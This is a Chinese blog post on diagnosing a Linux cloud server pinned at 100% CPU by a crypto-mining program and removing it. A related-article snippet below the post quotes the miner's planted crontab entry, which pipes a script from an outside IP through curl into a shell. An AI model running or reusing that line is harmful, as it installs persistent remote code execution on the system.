Linux服务器CPU100%问题(云服务器中了挖矿病毒)

最新推荐文章于 2024-08-14 03:32:03 发布
最新推荐文章于 2024-08-14 03:32:03 发布
阅读量2.9k 收藏 4
点赞数 3
分类专栏: JavaEE 文章标签: linux 运维 centos java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A12115419/article/details/119063779
版权

今天玩云服务器,发现服务器变得很卡顿,解压文件有时都卡死了,很奇怪,不知道服务器出了什么状况。
于是登录到阿里云查看云服务器的情况,结果发现服务器的CPU使用率一直维持在100%。
在这里插入图片描述
于是远程连接到服务器,进行问题排查

1、查消耗cpu最高的进程PID,输入top命令

在这里插入图片描述
2、根据PID查出消耗cpu最高的线程号。top -Hp 512,显示一个进程的线程运行信息列表。
在这里插入图片描述
3、把上面线程的十进制数转成十六进制(printf %x 1062)
为426

4、根据线程号查出对应的java线程,进行处理。jstack -l 512 > ./512.stack,然后执行grep命令,看线程426做了什么

cat 512.stack | grep '426' -C 20

结果发现没有一点效果,什么都没有显示。于是直接杀死进程
kill -9 512。再次执行top命令,发现CPU的使用率依旧很高,但是进程的PID却改变了。
在这里插入图片描述
于是思考可能不是由于JAVA程序内部的一些错误(死循环…)造成CPU使用率一直维持在100%

再次执行top命令,仔细观察发现COMMAND显示的是[ext4]
在这里插入图片描述

于是怀疑服务器是不是中了某种病毒,导致恶意脚本代码执行,进而占用大量CPU。打开阿里云 云安全中心

在这里插入图片描述
发现服务器被植入了挖矿程序,程序脚本就在==/var/tmp/.system==目录下
,删除文件 rm -rf *,并杀死进程512 kill - 9 512

发现CPU恢复正常。
在这里插入图片描述

小小本科生debug
关注
专栏目录
linux 挖矿病毒,占用大量cpu,杀毒过程
lg4546的专栏
07-19 766
linux 挖矿病毒 , cpu 占用比较大 lVlgd 进程 , crontab 定时执行
病毒】【CPU使用率为100%】Linux 被 kdevtmpfsi 挖矿病毒入侵
走在搬砖的路上!
11-17 1197
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
linux cpu飙高到100%----挖矿程序
Qfoom的博客
11-25 1511
感谢:简书SilentBillows 一 定位问题 1.发现cpu异常,查看对应的进程信息 [root@versionlibrary /]# top top - 10:56:10 up 15 min, 1 user, load average: 7.28, 7.24, 4.90 Tasks: 209 total, 5 running, 204 sleeping, 0 stopped, 0 zombie %Cpu(s): 96.5 us, 3.5 sy, 0.0 ni, 0.0 i
排查腾讯云服务器挖矿病毒【pnscan】挟持
fanxindong0620的博客
09-27 6557
一、问题发现 最新在使用腾讯云部署项目应用,具体方式为docker部署,今天早上起床发现腾讯发来一条报警信息: 二、排查过程 使用last查看最近登录信息 使用history查看历史指令 查看/etc/passwd下的账户信息 查看日志文件/var/log/secure和/var/log/message 使用top查看进程运行信息 使用netstat查看端口信息 三、解决方案 ...
Linux 系统 CPU 100% 打满了!
最新发布
weixin_42502957的博客
08-14 412
1、事件昨天下午突然收到运维邮件报警,显示数据平台服务器cpu利用率达到了98.94%,而且最近一段时间一直持续在70%以上,看起来像是硬件资源到瓶颈需要扩容了,但仔细思考就会发现咱们的业务系统并不是一个高并发或者CPU密集型的应用,这个利用率有点太夸张,硬件瓶颈应该不会这么快就到了,一定是哪里的业务代码逻辑有问题。2、排...
linux数据库服务器cpu 100%,linux服务器cpu使用率总是100%解决方案
weixin_30096321的博客
04-29 402
linux服务器cpu使用率总是100%解决方案靠山:老早之前就查看服务器上的cpu一直居高不下,总以为是有什么大的程序运行(确实是,只不过是挖矿的找到你的服务器,使用你的cpu举行挖矿),厥后百度后才知道是有一种挖矿病毒kdevtmpfsi。但厥后由于项目重写了,小我私家项目由此被耽误了,以是暂时停顿,今天抽闲解决了下。仅仅是记录下这样的事情若何解决,顺便温习下linux的指令。缘故原由大部...
LinuxLinux突然发现CPU占用100%该怎么办?如何排查进程(带你一文解决)
miles067的博客
09-07 1万+
LinuxCPU发现占用率100%,一般会由什么情况引起? 1、进程负载过高: 一个或多个进程消耗了大量CPU资源,导致整个系统的CPU占用率升高。 可能的原因包括运行超过预期的任务、过度并发的请求、死循环等。 2、错误配置的服务或应用程序: 配置错误的服务或应用程序可能导致它们占用过多的CPU资源。 例如,错误的线程池配置、无限递归、频繁的IO操作等。 3、恶意软件或病毒: 恶意软件或病毒可能在系统运行并消耗大量CPU资源。 这些恶意程序通常会伪装成正常的进程,使其更难以检测和终
Linux服务器成功处理kdevtmpfsi挖矿程序,亲测有效!
x-dragon8899的博客
09-04 834
通过 top 命令查看服务器,发现CPU资源使用一直处于100%的状态,原因是kdevtmpfsi进程占用了CPU,现需处理掉这个挖矿程序。发现没有 kdevtmpfsi 进程占用CPU,清理成功!服务器CPU从52%恢复为3.5%!
linux病毒感染 CPU使用很高
qq_40914968的博客
04-18 1393
被当矿机。。挖矿 这个机器运行着k8s master 着几十个应用和DB 不能重装 crontab -e 查到 dd掉这段 删除 后续处理: 删除/var/spool/cron/crontab/root,/var/spool/cron/root文件echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | ...
linux服务器CPU过高毒排查
HouYing
11-30 1619
通过top查看到了,占用CPU过高进程,记录下进程号 cd/proc/进程号 ls -la 查看到exe后边对应的命令为:usr/bin/-bash (deleted) 在每小时的脚本找到了sync,然后通过这个找到了病毒所在目录:/bin/sysdrr 病毒清理脚本如下: chattr -R -i /bin/sysdrr chattr -R -i /etc/cron.d/0hourly chattr -R -i /etc/cron.daily/sync chattr -R -i /.
服务器Linux挖矿木马病毒(kswapd0进程使cpu爆满)
热门推荐
小韩的博客
04-03 3万+
服务器Linux挖矿木马病毒(kswapd0进程使cpu爆满)
腾讯云Centos8.0 CPU使用率100%,top查询为kthreaddk占用异常
H_Dsheng的博客
12-01 2125
腾讯云Centos8.0 宝塔显示CPU使用率100%,top查询为kthreaddk占用异常 腾讯云Centos8.0 清不完的kthreaddk kthreaddk异常占用过高导致CPU使用率达100%的解决方案
linux被黑?CPU持续50%?do it!
jerry003的博客
12-06 1416
今天ubuntu 18.04的 linux系统出现了一个奇怪的现象: 系统只要一开机,10分钟左右,会出现一个莫名的进程,然后CPU就直接被砍掉一半(50%),然后就维持在50% 水平。当然可以通过 top 命令锁定进程PID,并通过 kill -9 PID 干掉它,但这样的处理是暂时的。不用多久,它又滋生出来,相当恶心。经求教,发现是系统被黑。遂请大佬指点,三两行代码,药到病除,特记录于此。 被黑进程小样 dayon@X9:/proc$ top top - 21:58:12 up 3:42, 4 us
Linux CPU 占用率 100% 排查
Young_Black的博客
03-29 567
curl http://localhost:9999/api/cpu/10000000000,发现 CPU 一会儿就飙到了 100%,接下来我们按五步法探个究竟。对于线上问题定位来说,分秒必争,所以我们在编码过程,除了要实现业务功能交付,还要追求代码质量,要写出更高效、更优雅的代码。从图,我们可以看到进程 pid 为 11168 的占用 CPU 是最高的,直接是 100%。找到对应的代码看一下,果真如此,问题已定位,优化代码逻辑吧~~~~
Linux CPU占用率99%很高被kdevtmpfsi 和kinsing 挖矿病毒入侵
小蜜蜂
02-23 3684
目录 一:警告 二:查看cup占用 三:解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4:删除掉kdevtmpfsi的相关文件 四.怎么预防处理这个病毒 一:警告 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为...
linux 进程 cpu 100,清理linux占用CPU 100%的病毒
weixin_33014989的博客
05-10 320
病毒名随机,自启动并相互保护。快速清理流程假设的名字是wobprwmnqhzbve,如果top看不到,可以在/etc/init.d目录下面查看1、首先锁定三个目录,不能让新文件产生禁止该文件执行chmod 000 /usr/bin/wobprwmnqhzbve锁定chattr +i /usr/binchattr +i /binchattr +i /tmp2、锁定crontab文件,不让任何进程写入...
Centos/Debian 占用CPU100%挖矿病毒清理
lsy1162526799的博客
04-06 1628
Cetnos/Debian 占用CPU100%挖矿病毒清理 ①top命令查看病毒进程,现在它一般由十位数随机字符串组成 找到进程ID,例如7538,执行: systemctl status 7538 其一般会有一个守护进程,如: 'cgroup…/system.slice/cron.service 7542 xxx 7538 xxx’ 在/tmp/.X11-unix/下一般会有记录守护进程id的文件,不为空的里面好像有加密串,可以解密看看 总之: kill -9 7542 kill -9 7538 ②清
linux centos7 解决挖矿病毒kthreaddk 高CPU占用
m0_66127371的博客
09-30 1839
病毒修复
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小小本科生debug

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值